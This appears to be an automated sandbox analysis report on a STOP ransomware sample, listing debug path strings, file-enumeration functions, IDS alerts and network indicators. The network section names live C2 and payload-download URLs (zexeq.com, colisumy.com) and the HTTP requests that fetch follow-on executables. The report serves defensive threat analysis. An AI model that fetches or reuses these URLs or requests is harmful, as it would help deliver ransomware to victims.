Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbAppCache133408907975188232.txt\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\y.IE5\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271508428.00000000042E0000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268742531.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279327675.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280009044.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2281570328.000000000429E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\Pg source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327608090.0000000004613000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2281607594.0000000004503000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*d source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\% source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2281607594.0000000004555000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304673578.000000000455B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289409280.000000000451B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289789240.0000000004543000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2287934159.000000000451A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304545377.000000000454A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\p\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*ta\Nn< source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305033543.0000000004198000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbrogFile_October_3_2023__13_9_20.txtpol source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\V source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315018219.0000000004502000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316096635.0000000004523000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\N source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246153971.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245622886.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246064156.000000000429E000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246411103.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorb source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220586448.0000000003D01000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220855829.0000000003D07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\b source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280221874.00000000041B4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279813612.0000000004199000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.0000000004174000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2282207150.00000000041E3000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279327675.0000000004179000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305914874.000000000415F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\2E source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2020128101.0000000003D19000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019336815.0000000003D05000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2020095647.0000000003D15000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019923625.0000000003D0D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246554838.0000000003D07000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245102965.0000000003CF9000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245017706.0000000003CDC000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245433373.0000000003D01000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246153971.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245622886.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246064156.000000000429E000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246411103.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.vapo source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\< source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\les\\\{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2325989468.0000000004682000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2328255306.000000000468A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2333695957.000000000468A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\#8 source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288915602.0000000004171000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_00480160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	0_2_00480160
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_0047F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	0_2_0047F730
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_0047FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	0_2_0047FB98
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 2_2_0047F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	2_2_0047F730
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 2_2_00480160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	2_2_00480160
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 2_2_0047FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	2_2_0047FB98
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 3_2_00E2F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	3_2_00E2F730
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 3_2_00E30160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	3_2_00E30160
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 3_2_00E2FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	3_2_00E2FB98
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E30160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	4_2_00E30160
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E2F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	4_2_00E2F730
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E2FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	4_2_00E2FB98

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.4:49732 -> 199.59.242.150:80
Source: Traffic	Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.4:49732 -> 199.59.242.150:80
Source: Traffic	Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.4:49734 -> 199.59.242.150:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://zexeq.com/raud/get.php

Source: Joe Sandbox View	IP Address: 199.59.242.150 199.59.242.150
Source: Joe Sandbox View	IP Address: 199.59.242.150 199.59.242.150
Source: Joe Sandbox View	IP Address: 104.21.65.24 104.21.65.24

Source: Joe Sandbox View

ASN Name: BODIS-NJUS BODIS-NJUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Code function: 0_2_0047CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_0047CF10

Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
Source: global traffic	HTTP traffic detected: GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
Source: global traffic	HTTP traffic detected: GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.comCookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950
Source: global traffic	HTTP traffic detected: GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.comCookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950
Source: global traffic	HTTP traffic detected: GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.comCookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950
Source: global traffic	HTTP traffic detected: GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.comCookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950
Source: global traffic	HTTP traffic detected: GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.comCookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950
Source: global traffic	HTTP traffic detected: GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.comCookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950
Source: global traffic	HTTP traffic detected: GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.comCookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950

Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1934918395.0000000004120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935241959.0000000004120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935388771.0000000004120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: api.2ip.ua

Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://colisumy.com/dl/build2.exe
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.000000000136F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.0000000001389000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://colisumy.com/dl/build2.exe$run
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://colisumy.com/dl/build2.exerun00.Y
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1934779392.0000000004120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.amazon.com/
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1934984061.0000000004120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935045851.0000000004120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.live.com/
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935112454.0000000004120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.nytimes.com/
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935177752.0000000004120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.reddit.com/
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935241959.0000000004120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.twitter.com/
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935312916.0000000004120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.wikipedia.com/
